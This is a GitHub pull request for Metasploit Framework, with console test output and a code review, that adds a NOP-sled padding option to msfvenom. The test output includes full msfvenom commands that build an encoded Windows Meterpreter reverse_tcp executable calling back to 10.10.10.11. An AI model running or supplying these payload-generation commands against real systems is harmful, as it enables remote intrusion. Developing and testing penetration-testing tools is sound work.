New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

#6100 : --pad-nops option for msfvenom #10872

Merged
merged 5 commits into from Nov 21, 2018

Conversation

Projects
None yet
6 participants
@runt1me

runt1me commented Oct 26, 2018

Adds an option --pad-size <payload size> to msfvenom to prepend a NOP sled of appropriate length given total <payload size>.

Relevant issue: msfvenom - total payload space, fill with nops #6100

Verification

  • Run msfvenom with --pad-size option on the console (various use cases shown below)

Console Output

Correct usage, --pad-size larger than payload size

vader@deathstar:~/git/metasploit-framework$ ./msfvenom --pad-size 420 -p windows/meterpreter/reverse_tcp -a x86 --platform windows -b "\x00" LHOST=10.10.10.11 -f exe > ~/out.exe
Found 10 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 368 (iteration=0)
x86/shikata_ga_nai chosen with final size 368
Successfully added NOP sled of size 52 from x86/single_byte
Payload size: 420 bytes
Final size of exe file: 73802 bytes

--pad-size equal to payload size (no NOP sled added, but no errors thrown)

vader@deathstar:~/git/metasploit-framework$ ./msfvenom --pad-size 368 -p windows/meterpreter/reverse_tcp -a x86 --platform windows -b "\x00" LHOST=10.10.10.11 -f exe > ~/out.exe
Found 10 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 368 (iteration=0)
x86/shikata_ga_nai chosen with final size 368
Payload size: 368 bytes
Final size of exe file: 73802 bytes

--pad-size less than payload size but greater than zero (error is raised, no executable generated)

vader@deathstar:~/git/metasploit-framework$ ./msfvenom --pad-size 367 -p windows/meterpreter/reverse_tcp -a x86 --platform windows -b "\x00" LHOST=10.10.10.11 -f exe > ~/out.exe
Found 10 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 368 (iteration=0)
x86/shikata_ga_nai chosen with final size 368
Error: pad-size value 367 is less than payload size.

--pad-size less than or equal to zero - don't know why anyone would do this, but no NOP sled is added

vader@deathstar:~/git/metasploit-framework$ ./msfvenom --pad-size 0 -p windows/meterpreter/reverse_tcp -a x86 --platform windows -b "\x00" LHOST=10.10.10.11 -f exe > ~/out.exe
Found 10 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 368 (iteration=0)
x86/shikata_ga_nai chosen with final size 368
Payload size: 368 bytes
Final size of exe file: 73802 bytes

--pad-size and -n options are both given - generates an error

vader@deathstar:~/git/metasploit-framework$ ./msfvenom --pad-size 420 -n 52 -p windows/meterpreter/reverse_tcp -a x86 --platform windows -b "\x00" LHOST=10.10.10.11 -f exe > ~/out.exe
Error: Option --pad-size and -n cannot be used together

7043mcgeep added some commits Oct 15, 2018

@runt1me

This comment has been minimized.

runt1me commented Oct 31, 2018

ping @FireFart @jvazquez-r7 @bcook-r7 - committers who commented on original issue

@bwatters-r7

This comment has been minimized.

Contributor

bwatters-r7 commented Nov 9, 2018

Makes sense to me....
It does not appear to break anything when not in use (at least on windows)..... I'll run some more tests using it to be sure.
image

@bwatters-r7 bwatters-r7 self-assigned this Nov 14, 2018

@busterb

This comment has been minimized.

Contributor

busterb commented Nov 20, 2018

Thanks, checking it out.

@@ -124,6 +130,7 @@ def initialize(opts={})
@iterations = opts.fetch(:iterations, 1)
@keep = opts.fetch(:keep, false)
@nops = opts.fetch(:nops, 0)
@padsize = opts.fetch(:padsize, 0)

This comment has been minimized.

@busterb

busterb Nov 20, 2018

Contributor

minor whitespace issue here, I can fix that. Just be sure to use spaces instead of tabs in the future

This comment has been minimized.

@7043mcgeep

7043mcgeep Nov 20, 2018

Contributor

Thanks, sorry about this. I'll be more careful in the future.

@@ -364,6 +371,9 @@ def generate_payload
encoded_payload = encode_payload(raw_payload)
end
encoded_payload = prepend_nops(encoded_payload)
if(@padsize > 0)

This comment has been minimized.

@busterb

busterb Nov 20, 2018

Contributor

same thing here. surprised msftidy didn't complain.

@busterb

This comment has been minimized.

Contributor

busterb commented Nov 20, 2018

Testing, I can fixup the whitespace nits noticed in the code, not a biggie.

@busterb

This comment has been minimized.

Contributor

busterb commented Nov 20, 2018

After playing with this more, I think it would be better if it was a switch that just puts the padding bytes on the front, rather than a mutually-exclusive number you specify instead of -n. That'll mean we don't have to handle an error condition either. I'll fix it up to work that way.

@7043mcgeep

This comment has been minimized.

Contributor

7043mcgeep commented Nov 21, 2018

After playing with this more, I think it would be better if it was a switch that just puts the padding bytes on the front, rather than a mutually-exclusive number you specify instead of -n. That'll mean we don't have to handle an error condition either. I'll fix it up to work that way.

I don't quite understand. Currently pad-size takes a parameter which represents total desired payload size. If pad-size is a switch, how does venom know the amount of nop bytes to prepend?

@busterb

This comment has been minimized.

Contributor

busterb commented Nov 21, 2018

Sorry, I wasn't very clear. I was thinking more like this with a slightly modified flag:

msfvenom -n 1024 means prepend 1024 nop bytes (current behavior)
msfvenom -n 1024 --pad-nops means prepend nop bytes until the total size is 1024

That way we don't need the error check like "Option --pad-size and -n cannot be used together", the flag just makes it do the extra math accounting for the payload size. If that's confusing, we can keep this as-is.

@7043mcgeep

This comment has been minimized.

Contributor

7043mcgeep commented Nov 21, 2018

Sorry, I wasn't very clear. I was thinking more like this with a slightly modified flag:

msfvenom -n 1024 means prepend 1024 nop bytes (current behavior)
msfvenom -n 1024 --pad-nops means prepend nop bytes until the total size is 1024

That way we don't need the error check like "Option --pad-size and -n cannot be used together", the flag just makes it do the extra math accounting for the payload size. If that's confusing, we can keep this as-is.

Good idea. I like this approach much better, and it requires much less LOC. I used spaces instead of tabs this time :-)

@busterb busterb changed the title from #6100 : --pad-size option for msfvenom to #6100 : --pad-nops option for msfvenom Nov 21, 2018

@busterb

This comment has been minimized.

Contributor

busterb commented Nov 21, 2018

Great, thanks! Checking it out now.

@busterb busterb merged commit 30bf716 into rapid7:master Nov 21, 2018

1 check passed

continuous-integration/travis-ci/pr The Travis CI build passed
Details

busterb added a commit that referenced this pull request Nov 21, 2018

msjenkins-r7 added a commit that referenced this pull request Nov 21, 2018

@busterb

This comment has been minimized.

Contributor

busterb commented Nov 21, 2018

Release Notes

This adds a --pad-nops option for msfvenom to pad a payload up to -n nops bytes. This is useful when replacing shellcode in an exploit with a fixed-length payload.

@busterb

This comment has been minimized.

Contributor

busterb commented Nov 21, 2018

Thanks @runt1me !

@7043mcgeep 7043mcgeep referenced this pull request Nov 26, 2018

Open

#6637: Adds msfvenom option --sec-name #10892

1 of 1 task complete
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment